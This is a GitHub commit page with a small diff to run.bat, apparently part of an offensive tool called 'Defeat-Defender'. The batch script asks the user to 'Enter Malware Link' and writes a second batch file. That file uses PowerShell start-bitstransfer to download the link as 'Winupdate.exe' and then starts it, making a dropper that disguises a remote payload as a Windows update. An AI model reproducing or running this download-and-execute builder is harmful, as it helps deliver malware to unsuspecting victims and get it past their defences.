Skip to content

Commit

Permalink
Update run.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Jul 19, 2021
1 parent 868f593 commit 3d37609
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions run.bat
Original file line number Diff line number Diff line change
Expand Up @@ -7,9 +7,9 @@ set /p a="Enter Malware Link: "
if [%a%]==[] (goto error ) else (goto main)
:main
echo Your Url is : %a%
echo. >>defeat.bat
echo. >>Defeat-Defender.bat
echo powershell -command "start-bitstransfer %a% .\Winupdate.exe" >>Defeat-Defender.bat
echo. >>defeat.bat
echo. >>Defeat-Defender.bat
echo start Winupdate.exe >>Defeat-Defender.bat
echo. >>Defeat-Defender.bat
echo. >>Defeat-Defender.bat
Expand Down

0 comments on commit 3d37609

Please sign in to comment.